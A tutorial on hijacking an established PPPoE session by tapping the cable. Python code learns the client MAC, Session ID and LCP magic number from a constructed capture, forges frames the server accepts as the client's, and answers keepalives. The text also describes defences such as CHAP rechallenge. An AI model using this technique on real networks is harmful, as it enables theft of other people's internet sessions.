Intercept PPPoE Session

  • Tutorial


The video shows a practical way to hijack a PPPoE session by tapping into the cable. No login or password is intercepted in this attack, and the authentication method in use (CHAP or PAP) does not matter.

Unfortunately, most Ethernet providers do not encrypt the whole session and only protect the authentication step (with CHAP the password never crosses the wire, only a challenge and its response). Everything after that travels in the clear, so an attacker who captures the parameters of an established session can pose as the legitimate client.



Theory



PPPoE (Point-to-Point Protocol over Ethernet) is a data-link layer protocol, one level below IP, so no IP address is needed to set up a connection: addressing is done by MAC.

Roughly, the connection is set up like this:

The client looking for a PPPoE server broadcasts a PADI (destination MAC FF:FF:FF:FF:FF:FF). Servers answer with a PADO, the client picks one with a PADR, and the server confirms with a PADS that assigns the Session ID.
PPP then runs inside the session: LCP negotiation, authentication (for example a CHAP Challenge and Response), and IPCP, which hands out the IP address.



Once the session is established, the server identifies the client by its MAC address and the Session ID; IP packets travel encapsulated in PPPoE session frames. Since nothing is encrypted, the full contents of every packet can be read off the wire.



Accordingly, once those details are known, the session can be taken over: an attacker who clones the client's MAC and reuses its Session ID is indistinguishable from the client at this layer.
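The following Python is an added example, not code from the video or from rp-pppoe. It walks a constructed tap of an existing session (the MACs 00:11:22:33:44:55 and 66:77:88:99:aa:bb, session ID 0x0123 and the LCP magic number 0xDEADBEEF are all made up), recovers the values the server identifies the client by, forges a session frame the server will accept as the client's, and builds the LCP Echo-Reply that the new holder of the client's end has to keep sending (the keepalive point raised in the notes at the end of the page). The PPPoE and LCP layouts follow RFC 2516 and RFC 1661; the IPv4 payload is a dummy header, not a real packet.

```python
"""Learn a PPPoE session's identifying parameters from tapped frames and forge
frames the server will accept as the legitimate client's (added example)."""
import struct

ETH_PPPOE_DISC = 0x8863      # EtherType: PPPoE discovery stage (PADI/PADO/PADR/PADS)
ETH_PPPOE_SESS = 0x8864      # EtherType: PPPoE session stage (PPP inside)
PADS = 0x65                  # discovery code: Session-confirmation, carries the Session ID
PPP_IP = 0x0021              # PPP protocol: IPv4
PPP_LCP = 0xC021             # PPP protocol: Link Control Protocol
LCP_ECHO_REQUEST, LCP_ECHO_REPLY = 9, 10

# Constructed sample addresses and session ID, not from any real capture
SERVER_MAC = "00:11:22:33:44:55"
CLIENT_MAC = "66:77:88:99:aa:bb"
SESSION_ID = 0x0123


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def pppoe_frame(dst, src, ethertype, code, session_id, payload):
    """Ethernet header + PPPoE header (ver 1, type 1, code, Session ID, length)."""
    hdr = struct.pack("!BBHH", 0x11, code, session_id, len(payload))
    return mac_bytes(dst) + mac_bytes(src) + struct.pack("!H", ethertype) + hdr + payload


def lcp_echo(code, ident, magic):
    """PPP payload for an LCP Echo-Request/Reply: protocol, code, id, length, magic."""
    return struct.pack("!HBBHI", PPP_LCP, code, ident, 8, magic)


def parse_frame(frame):
    """Return the fields an attacker cares about; None for non-PPPoE frames."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype not in (ETH_PPPOE_DISC, ETH_PPPOE_SESS):
        return None
    _vt, code, session_id, length = struct.unpack("!BBHH", frame[14:20])
    payload = frame[20:20 + length]
    info = {"dst": mac_str(frame[:6]), "src": mac_str(frame[6:12]), "ethertype": ethertype,
            "code": code, "session_id": session_id, "ppp_proto": None, "ppp_data": b""}
    if ethertype == ETH_PPPOE_SESS and len(payload) >= 2:
        # RFC 2516: the session payload starts directly with the 2-byte PPP protocol field
        info["ppp_proto"] = struct.unpack("!H", payload[:2])[0]
        info["ppp_data"] = payload[2:]
    return info


def learn_session(frames):
    """Walk tapped frames and recover what the server identifies the client by:
    client MAC, server MAC and Session ID (from the PADS), plus the client's LCP magic
    number (from any Echo-Request/Reply it sent), needed to answer keepalives later."""
    session = {}
    for frame in frames:
        p = parse_frame(frame)
        if p is None:
            continue
        if p["ethertype"] == ETH_PPPOE_DISC and p["code"] == PADS:
            session.update(server_mac=p["src"], client_mac=p["dst"], session_id=p["session_id"])
        elif p["ethertype"] == ETH_PPPOE_SESS:
            session.setdefault("session_id", p["session_id"])
            d = p["ppp_data"]
            if (p["ppp_proto"] == PPP_LCP and len(d) >= 8
                    and d[0] in (LCP_ECHO_REQUEST, LCP_ECHO_REPLY)
                    and p["src"] == session.get("client_mac")):
                session["client_magic"] = struct.unpack("!I", d[4:8])[0]   # magic follows the 4-byte LCP header
    return session


def forge_client_frame(session, ppp_payload):
    """Session-stage frame with the client's MAC as source and its Session ID: at this
    layer the server cannot tell it from the real client's traffic."""
    return pppoe_frame(session["server_mac"], session["client_mac"],
                       ETH_PPPOE_SESS, 0x00, session["session_id"], ppp_payload)


def lcp_echo_reply(session, echo_request_frame):
    """Answer the server's LCP Echo-Request with the request's identifier and the
    client's magic number, so the hijacked session is not torn down as dead."""
    p = parse_frame(echo_request_frame)
    if (p is None or p["ppp_proto"] != PPP_LCP or len(p["ppp_data"]) < 8
            or p["ppp_data"][0] != LCP_ECHO_REQUEST):
        raise ValueError("not an LCP Echo-Request")
    return forge_client_frame(session, lcp_echo(LCP_ECHO_REPLY, p["ppp_data"][1], session["client_magic"]))


def sample_capture():
    """Constructed tap of an existing session: the server's PADS, then a client
    Echo-Request and an IPv4 frame whose payload is a dummy 20-byte header."""
    pads = pppoe_frame(CLIENT_MAC, SERVER_MAC, ETH_PPPOE_DISC, PADS, SESSION_ID,
                       struct.pack("!HH", 0x0101, 0))          # empty Service-Name tag
    echo = pppoe_frame(SERVER_MAC, CLIENT_MAC, ETH_PPPOE_SESS, 0, SESSION_ID,
                       lcp_echo(LCP_ECHO_REQUEST, 7, 0xDEADBEEF))
    ip = pppoe_frame(SERVER_MAC, CLIENT_MAC, ETH_PPPOE_SESS, 0, SESSION_ID,
                     struct.pack("!H", PPP_IP) + bytes([0x45]) + bytes(19))
    return [pads, echo, ip]


if __name__ == "__main__":
    s = learn_session(sample_capture())
    print("learned:", s)
    hijack = forge_client_frame(s, struct.pack("!H", PPP_IP) + bytes([0x45]) + bytes(19))
    print("forged frame:", parse_frame(hijack))
```

Two things the code makes concrete: the server's only handle on the client is the (MAC, Session ID) pair, so cloning the MAC is mandatory, not optional; and the magic number has to be learned from the tap as well, because an Echo-Reply with the wrong magic is as good as no reply.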



A defence against this is CHAP rechallenge: the server re-authenticates the client at a set interval (in pppd this is the chap-interval option), which the hijacker cannot pass because the password was never captured. None of the providers tested used it. Note that it only helps with CHAP: if the client reconnects over PAP while the tap is in place, the password itself crosses the wire in clear text. Encrypting the session rather than only the authentication step would remove the problem entirely.

The video uses a virtual machine in bridged mode on the host's Ethernet card.
When the cable is swapped over, the swap has to land between two LCP echo exchanges: if the server's LCP Echo-Requests go unanswered past its failure limit it drops the session, and whoever now holds the client's end must keep answering them.
The PPPoE server from www.roaringpenguin.com/products/pppoe (rp-pppoe) was rebuilt with the option
#define DEFAULT_MAX_SESSIONS 64000

Thanks to kekekeks for help in picking the source of the rp-pppoe server.
